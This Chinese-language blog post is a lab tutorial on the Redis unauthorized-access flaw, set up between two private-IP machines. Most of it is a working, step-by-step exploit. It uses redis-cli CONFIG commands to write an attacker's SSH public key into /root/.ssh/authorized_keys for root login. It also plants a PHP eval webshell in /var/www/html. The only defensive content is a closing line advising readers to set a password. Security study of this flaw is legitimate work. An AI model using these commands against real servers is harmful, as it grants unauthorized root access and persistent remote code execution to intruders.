Redis未授权访问漏洞

Redis未授权访问漏洞

Redis介绍

Redis（全称：Remote Dictionary Server 远程字典服务）是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。

漏洞原理

Redis默认不设置认证密码，任何人都可以直接连入6379端口，并将自己的ssh公钥写入进行免密登录
或者可以找到web根目录写入webshell

攻击环境配置

两台机器配置方法都一样，一台作为攻击机（192.168.1.130），一台作为靶机（192.168.1.137，靶机开启ssh服务）

安装Redis

wget http://download.redis.io/releases/redis-3.2.11.tar.gz
tar -zxvf redis-3.2.11.tar.gz
cd redis-3.2.11/
make
cd src
cp redis-server /usr/bin
cp redis-cli /usr/bin
cd ../
cp redis.conf /etc/
vi redis.conf
去掉ip绑定，将bind 127.0.0.1 改为#127.0.0.1注释掉，如下图

关闭保护模式，允许远程连接redis服务,如下图

开启redis服务
redis-server /etc/redis.conf

开始攻击

靶机开启redis服务
redis-server /etc/redis.conf
攻击机生成ssh公钥私钥，进入.ssh文件夹
ssh-keygen -t rsa
cd .ssh
导出ssh公钥到1.txt
(echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n")>1.txt
用攻击机将1.txt写入靶机
cat 1.txt|redis-cli -h 192.168.1.137 -x set crack
攻击机远程登录靶机
redis-cli -h 192.168.1.137
查看当前路径
CONFIG GET dir
切换至root下的ssh路径
CONFIG set dir /root/.ssh
设置上传公钥的备份文件名字为authorized_keys
config set dbfilename authorized_keys
检查是否更改成功
config get dbfilename
保存
save
退出
以攻击机直接ssh登录靶机
ssh -i id_rsa root@192.168.1.137

可以看到登陆成功

写入Webshell

redis-cli -h ip
config set dir /var/www/html
set xxx "\n\n\n<?php @eval($_POST['shell']);?>\n\n\n"
config set dbfilename shell.php
save

漏洞思考

记得设置密码和授权，否则号就没了……

本文作者： yd0ng
本文链接： https://yd0ng.github.io/2020/03/02/Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/
版权声明： 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处！

赏

谢谢您的打赏，大家一起加油喔~

支付宝

微信